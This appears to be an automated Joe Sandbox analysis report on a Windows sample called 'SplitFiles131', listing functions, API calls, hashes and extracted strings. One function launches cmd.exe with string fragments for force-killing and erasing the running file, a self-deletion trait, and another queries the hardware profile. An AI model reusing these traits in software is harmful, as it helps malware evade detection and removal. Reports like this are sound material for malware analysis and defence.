Instruction ID: f08724c49b25eef3d87a27f8e4f7b5a7e04b5c5297436c6f3479f7f723656a48
Opcode Fuzzy Hash: 0b7e1866d143fc2a1f884dde0244745e592096d5921bc9574330ee586fdfa3a8
Instruction Fuzzy Hash: 7C413D31A00104AACF11AB76CC127BEBBA19B15308F54447BE945B72C3EB7DDE46C69D

Uniqueness

Uniqueness Score: -1.00%

Function 004054C0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(DCBD048B), ref: 004054EC

Part of subcall function 00405420: OpenProcess.KERNEL32(00000410,00000000,?,00450D41,00000000), ref: 0040544B
Part of subcall function 00405420: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104,?,00450D41,00000000), ref: 00405466
Part of subcall function 00405420: FindCloseChangeNotification.KERNEL32(00000000,?,00450D41,00000000), ref: 0040546D

GetCurrentProcessId.KERNEL32 ref: 00405508

Part of subcall function 00405250: OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 004052B0
Part of subcall function 00405250: K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?,?), ref: 004052CD
Part of subcall function 00405250: K32GetModuleBaseNameA.KERNEL32(00000000,?,?,00000104,?,?,?,?), ref: 004052EA
Part of subcall function 00405250: FindCloseChangeNotification.KERNEL32(00000000,?,?,?,?), ref: 004052F1

ShellExecuteA.SHELL32(00000000,00000000,C:\Windows\System32\cmd.exe,00000000,00000000,00000000), ref: 004055A4

Strings

C:\Windows\System32\cmd.exe, xrefs: 0040559B
" /f & erase ", xrefs: 00405528
" & exit, xrefs: 0040554A

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: Process$ChangeCloseCurrentFindModuleNameNotificationOpen$BaseEnumExecuteFileModulesShell
String ID: " & exit$" /f & erase "$C:\Windows\System32\cmd.exe
API String ID: 3061982424-3347335610
Opcode ID: 6bc7b3ffeecbd7e61c6a60580daaf1c04a1e8b1486a71f75cba929ab9ffd069e
Instruction ID: bb57c133ade53ec488d370c8a58f02c66d8e32e9da8c978da3b10ee8368ab8b3
Opcode Fuzzy Hash: 6bc7b3ffeecbd7e61c6a60580daaf1c04a1e8b1486a71f75cba929ab9ffd069e
Instruction Fuzzy Hash: 35219030A00248DBC704FB75CC46BDDBBB4AB14708F50417AA506B71D2EFB82A49CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00405250 Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 004052B0
K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?,?), ref: 004052CD
K32GetModuleBaseNameA.KERNEL32(00000000,?,?,00000104,?,?,?,?), ref: 004052EA
FindCloseChangeNotification.KERNEL32(00000000,?,?,?,?), ref: 004052F1

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: Process$BaseChangeCloseEnumFindModuleModulesNameNotificationOpen
String ID:
API String ID: 1316604328-0
Opcode ID: c0d1d87ece03490290b5015221e901385bd44465a3c604b87790a323a267429d
Instruction ID: 317e0fa30e6df0fc2493c0f556c76fdcfe70c6514a20a7537da84c3b601fc5e8
Opcode Fuzzy Hash: c0d1d87ece03490290b5015221e901385bd44465a3c604b87790a323a267429d
Instruction Fuzzy Hash: 7121C471A005199BD725DF65DC05BEAB7B8EF09300F0002FAEA49A7280DBF45AC5CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00421028 Relevance: 4.7, APIs: 3, Instructions: 170fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004207BB: GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 00420803

WriteFile.KERNEL32(?,00000000,00000000,?,00000000,0000000C,00000000,00000000,?,?,?,00000000,?,?,?,00000000), ref: 0042116E
GetLastError.KERNEL32(?,?,?,00000000,?,?,?,00000000), ref: 00421178
__dosmaperr.LIBCMT ref: 004211B7

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: ConsoleErrorFileLastOutputWrite__dosmaperr
String ID:
API String ID: 910155933-0
Opcode ID: e24a92b2f476dda8a345309e2f2059689fa752e10403ff131c579cb01226544e
Instruction ID: 3c7e185e40fd80dbdae143d1bdd6e74d6c83d27f732932d537b6873211927bf6
Opcode Fuzzy Hash: e24a92b2f476dda8a345309e2f2059689fa752e10403ff131c579cb01226544e
Instruction Fuzzy Hash: 4F513671F00269ABDB209FA9D805FEF7BB5AF59314F54004BE500A7262C77CDA82C769

Uniqueness

Uniqueness Score: -1.00%

Function 00424B90 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00424B99
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00424C07

Part of subcall function 00420094: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,004213AE,?,00000000,00000000), ref: 00420140

Part of subcall function 0041ED2F: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040FF9B,?,?,?,?,?,00403757,?,?,?), ref: 0041ED61

_free.LIBCMT ref: 00424BF8

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: a99ed16166c4cb6fd5d58302230d1ee3cac86f8bd5c28f31c17afe00db9e4936
Instruction ID: 8e17b8cbccb8b4fc6403cf286aecc81c96b356ed4abcbad2db771e8ab638680e
Opcode Fuzzy Hash: a99ed16166c4cb6fd5d58302230d1ee3cac86f8bd5c28f31c17afe00db9e4936
Instruction Fuzzy Hash: 1101FC727012357B2331167B3C89E7F6D5DCDC2B94396012AFE04D6201EDA8DC0281BC

Uniqueness

Uniqueness Score: -1.00%

Function 0041EC93 Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(00000000,00000000,00012000,?,0041EBC1,00012000,0043BDF8,0000000C,0041EC73,0043DAA0), ref: 0041ECE9
GetLastError.KERNEL32(?,0041EBC1,00012000,0043BDF8,0000000C,0041EC73,0043DAA0), ref: 0041ECF3
__dosmaperr.LIBCMT ref: 0041ED1E

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: d60001a35fcf9b4c3d1a3c2dde78454ab33b26a104938e4cfaa07c3bd8a184cd
Instruction ID: 2ccc4e0a667c62fdb768d4e4b7cf41dbe42b991734cf967249ceca80e9307b57
Opcode Fuzzy Hash: d60001a35fcf9b4c3d1a3c2dde78454ab33b26a104938e4cfaa07c3bd8a184cd
Instruction Fuzzy Hash: E001E93A70152056D5342237BC497EE67468B82738F29055BFC06873C6EA7DCCC252DD

Uniqueness

Uniqueness Score: -1.00%

Function 00405420 Relevance: 4.6, APIs: 3, Instructions: 51COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?,00450D41,00000000), ref: 0040544B
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104,?,00450D41,00000000), ref: 00405466
FindCloseChangeNotification.KERNEL32(00000000,?,00450D41,00000000), ref: 0040546D

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: ChangeCloseFileFindModuleNameNotificationOpenProcess
String ID:
API String ID: 4186666201-0
Opcode ID: 1393ca63317ed933dd5bffd107fb2ff396153b6cb66a741b0b6755bcac672aa0
Instruction ID: 922376feaebcf12d809977a557db1708a013f2b36cdaadcafb515ec78757bc9b
Opcode Fuzzy Hash: 1393ca63317ed933dd5bffd107fb2ff396153b6cb66a741b0b6755bcac672aa0
Instruction Fuzzy Hash: 741104306002189BD720DF25DC05BFBBBB4DB45700F0002AEE58597280DBF95A868FD8

Uniqueness

Uniqueness Score: -1.00%

Function 004066A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00406708

Strings

D, xrefs: 004066BC

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: D
API String ID: 963392458-2746444292
Opcode ID: ee5791995512ebe7736d57afe2c1496ebed76edc28558b6e22b2e9b0c1df2158
Instruction ID: 50eb80fa6753c829cd3f054dc80da8a320b46d7d2baa1acb39a29d7f976f20fa
Opcode Fuzzy Hash: ee5791995512ebe7736d57afe2c1496ebed76edc28558b6e22b2e9b0c1df2158
Instruction Fuzzy Hash: 7D21B031E1034CA7DB14DFA5CE457ADB3B2EB89704F209319F9157A184EB74AA808B88

Uniqueness

Uniqueness Score: -1.00%

Function 0041A61D Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041A665

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 526f0598ed6c5c09f80c27bed797f3bdec909cf5737d209df5188b07db91258f
Instruction ID: 569bb8f4cb614d0ae093e3d0afb7296beb312a053887baa6913238e5c0853e05
Opcode Fuzzy Hash: 526f0598ed6c5c09f80c27bed797f3bdec909cf5737d209df5188b07db91258f
Instruction Fuzzy Hash: F8E06C3650351145A615367B7C017F716898BD1379F69032BF854862D1DA7C88D240AF

Uniqueness

Uniqueness Score: -1.00%

Function 0041AA71 Relevance: 1.6, APIs: 1, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041AB24

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 59e20a6d73741625aa60e7257ae5aeb68c6bd765af771a165dc67992aa078022
Instruction ID: 80c14f1a6abcca7d923a46e9f34a6542aaf5e04ef8ab335fbec2492ac4023ecb
Opcode Fuzzy Hash: 59e20a6d73741625aa60e7257ae5aeb68c6bd765af771a165dc67992aa078022
Instruction Fuzzy Hash: 22318076A016109F8B14CFADC58099EF7F2FF8932072581A6D615EB360C334AD55CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00406760 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 00406786

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 4866f708c36be3b8c5458998122e6fbc1a421f3c5607ad6291c9d3a1b93d6214
Instruction ID: aa22e25d1b11b59e7382e39be16936437f2c1d5e4af8da413c1625e3f1392632
Opcode Fuzzy Hash: 4866f708c36be3b8c5458998122e6fbc1a421f3c5607ad6291c9d3a1b93d6214
Instruction Fuzzy Hash: BA11A9307002189BDB24EF65D8557BEB7B9EF09308F0005AEE84697781DF795A098BD5

Uniqueness

Uniqueness Score: -1.00%

Function 0041E0B9 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 0041E0F3

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: d4cc4cf86e9e065f416ef9d63789a222c11f165fcbbbb45fb3f736e95baad7dc
Instruction ID: 50b409054a80a02bec94d94242d16b3902a0bf72dd6f6a78c9df47ee9ec44d07
Opcode Fuzzy Hash: d4cc4cf86e9e065f416ef9d63789a222c11f165fcbbbb45fb3f736e95baad7dc
Instruction Fuzzy Hash: 39111575A0420AAFCF05DF59E9419DF7BF5EF48314F04406AF809AB351D670EA11CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00413F06 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf1009d72158ea1392668bdfd0f2e791b1cc169ecfef3ac691a9a242aa51b60d
Instruction ID: 1b8742a41d9530a921bcc596bb1ac412f032a833fb3448dd345c2ad50930357c
Opcode Fuzzy Hash: bf1009d72158ea1392668bdfd0f2e791b1cc169ecfef3ac691a9a242aa51b60d
Instruction Fuzzy Hash: B7F0F936D016106AD6312E3B9C067DA36688F4233AF11431BF824921D1DA7CEAC3869D

Uniqueness

Uniqueness Score: -1.00%

Function 00428630 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00428693

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 521115d978e45e608ea96acc4bbcbcaa1d0163517ca36d6091db2ee742d9455d
Instruction ID: 460fcbff9e95d3aa1796ce0ff75d521f962e5269c53dc2fc002039b783f7abde
Opcode Fuzzy Hash: 521115d978e45e608ea96acc4bbcbcaa1d0163517ca36d6091db2ee742d9455d
Instruction Fuzzy Hash: EC018472D0116DBFCF01AFA89C019DE7FB5BF08304F54016AFD14E2191E6358A60DB95

Uniqueness

Uniqueness Score: -1.00%

Function 0041ED2F Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,0040FF9B,?,?,?,?,?,00403757,?,?,?), ref: 0041ED61

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5231c26b2e5400a8b445dea9dc5c14e3c1ee74f90dcd341e6a6c6bc4848ff768
Instruction ID: 959c84357b1a9f0ee529832ae90eed3ec28ec96ce801b17d18c686e8694df61b
Opcode Fuzzy Hash: 5231c26b2e5400a8b445dea9dc5c14e3c1ee74f90dcd341e6a6c6bc4848ff768
Instruction Fuzzy Hash: 95E06539141222A7E6313767BD01BDB76599F467A4F150123FC45962A1CA5CCCC185AE

Uniqueness

Uniqueness Score: -1.00%

Function 1000873B Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,10003243,?,?,100024B8,0007A120), ref: 1000876D

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9bc71e6e4ec6e68a8c2aed3646502ff683cefb7352d8620f7e826d587402586a
Instruction ID: 67f11896f8f7d2121f3f4df057540a061ed8fd880985c25efa2fb590a71935ec
Opcode Fuzzy Hash: 9bc71e6e4ec6e68a8c2aed3646502ff683cefb7352d8620f7e826d587402586a
Instruction Fuzzy Hash: 82E0E53524D6216AF751D6618C4474A3A88FB413F0F324120FE8C9208CDE64DE0083E0

Uniqueness

Uniqueness Score: -1.00%

Function 00428377 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00428767,?,?,00000000,?,00428767,00000000,0000000C), ref: 00428394

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b718aefa274249b92c0224c2ff73fbbbd694e56a9348850d4764fd55e00e249d
Instruction ID: 6a3501348c7adacfcd1c424c20773ecf10769bdff7a35cf21c7a2e113d4d802e
Opcode Fuzzy Hash: b718aefa274249b92c0224c2ff73fbbbd694e56a9348850d4764fd55e00e249d
Instruction Fuzzy Hash: 19D06C3210014DFBDF128F85DC06EDA3BAAFB48714F014010BA1856060C772E822AB95

Uniqueness

Uniqueness Score: -1.00%

Function 100069B0 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 100069C3

Part of subcall function 10008701: RtlFreeHeap.NTDLL(00000000,00000000,?,100074AC), ref: 10008717
Part of subcall function 10008701: GetLastError.KERNEL32(?,?,100074AC), ref: 10008729

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: 4a8faf65200c92b95d684da80c623e720def96cf622f0f76f7dc9a0cc9b61c85
Instruction ID: c6a98ba0e5363ae005110d363abbfc5d7111903c5cce904da764f3f1e972a342
Opcode Fuzzy Hash: 4a8faf65200c92b95d684da80c623e720def96cf622f0f76f7dc9a0cc9b61c85
Instruction Fuzzy Hash: 8CC08C31000208FBDB00CB41C846A4E7BA8EB803A4F300044F40417240CAB2FF009A90

Uniqueness

Uniqueness Score: -1.00%

Function 00402E90 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 00402E9F

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 213a422f90c8c6353df42cf4beb6bca1ece7b85540c8c8c994e7d48a5d8c3a30
Instruction ID: b31a385f3b57fd4fd7166e142863b1bbbb6af29b0bf7193fe4047b5eb220286a
Opcode Fuzzy Hash: 213a422f90c8c6353df42cf4beb6bca1ece7b85540c8c8c994e7d48a5d8c3a30
Instruction Fuzzy Hash: CAC0483200020DFBCF025F82EC048DA3F2AFB08261B408024FA1C04030C7739972ABAA

Uniqueness

Uniqueness Score: -1.00%

Function 00402EB0 Relevance: 1.3, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 00402EBC

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 9e517827ee14b2795f6c39b1ac259b67fb15a98946d76ce23e4192bd4712f48a
Instruction ID: bdb844541333acea6d7cc9b38086a4600084955ffe6c4e25b5f0fe259d46e886
Opcode Fuzzy Hash: 9e517827ee14b2795f6c39b1ac259b67fb15a98946d76ce23e4192bd4712f48a
Instruction Fuzzy Hash: E4B0483200020CBB8F021F82EC048993F2AFB08260B448420FA180502087729522AB84

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00426D9F Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041CB63: GetLastError.KERNEL32(?,?,?,00413661,?,00000000,00405D9E,?,00418194,?,00000000,76686490,?,0041828D,00405D9E,00000000), ref: 0041CB68
Part of subcall function 0041CB63: SetLastError.KERNEL32(00000000,00000007,000000FF,?,00418194,?,00000000,76686490,?,0041828D,00405D9E,00000000,?,00405D9E,?), ref: 0041CC06

GetACP.KERNEL32(?,?,?,?,?,?,0041B763,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00426E60
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0041B763,?,?,?,00000055,?,-00000050,?,?), ref: 00426E8B
_wcschr.LIBVCRUNTIME ref: 00426F1F
_wcschr.LIBVCRUNTIME ref: 00426F2D
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00426FEE

Strings

utf8, xrefs: 00426F5D
)C, xrefs: 00426E16

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8$)C
API String ID: 4147378913-3322961178
Opcode ID: 20ef76e225b801900a59ab0872716af096e09f6a96c791c1d4433a4f633c1a20
Instruction ID: eed4488de9b567759dd5ff52785522d47d8f7e060e054a56165183b34d5168a2
Opcode Fuzzy Hash: 20ef76e225b801900a59ab0872716af096e09f6a96c791c1d4433a4f633c1a20
Instruction Fuzzy Hash: 2C711935B00222AADB24AF35ED42BB773A8EF44704F56406BF905D7281EB7CE941875D

Uniqueness

Uniqueness Score: -1.00%

Function 00427700 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041CB63: GetLastError.KERNEL32(?,?,?,00413661,?,00000000,00405D9E,?,00418194,?,00000000,76686490,?,0041828D,00405D9E,00000000), ref: 0041CB68
Part of subcall function 0041CB63: SetLastError.KERNEL32(00000000,00000007,000000FF,?,00418194,?,00000000,76686490,?,0041828D,00405D9E,00000000,?,00405D9E,?), ref: 0041CC06

Part of subcall function 0041CB63: _free.LIBCMT ref: 0041CBC5
Part of subcall function 0041CB63: _free.LIBCMT ref: 0041CBFB

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0042780C
IsValidCodePage.KERNEL32(00000000), ref: 00427855
IsValidLocale.KERNEL32(?,00000001), ref: 00427864
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 004278AC
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 004278CB

Strings

)C, xrefs: 004277B9

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID: )C
API String ID: 949163717-1336023901
Opcode ID: d6733786ce1444d89c0ece45410b3c14b7f86884eb63135eb5ebf69e9976cec0
Instruction ID: 8ad3d2252febc303d5905dee770c0fca35b5db36d8f6aca9aad01a9d0ac59951
Opcode Fuzzy Hash: d6733786ce1444d89c0ece45410b3c14b7f86884eb63135eb5ebf69e9976cec0
Instruction Fuzzy Hash: 74518671B042259BDB10EF65EC45EBF73B8EF44700F94447AE900E7250E7789944CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0042752B Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,IxB,00000002,00000000,?,?,?,00427849,?,00000000), ref: 004275C4
GetLocaleInfoW.KERNEL32(00000000,20001004,IxB,00000002,00000000,?,?,?,00427849,?,00000000), ref: 004275ED
GetACP.KERNEL32(?,?,00427849,?,00000000), ref: 00427602

Strings

IxB, xrefs: 004275DE, 004275FB, 004275B5, 004275CE, 004275B8, 004275E1
ACP, xrefs: 00427549
OCP, xrefs: 0042757F

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$IxB$OCP
API String ID: 2299586839-4141542707
Opcode ID: d473ddd763a2c2c897fe5dcf6db478f1cae410dc6a90a74f6531b1057af5c91b
Instruction ID: 80627bc4f1190bcbfed89345fe7bf2f4b32af40f38ec4df066e79ffa23b7ef9e
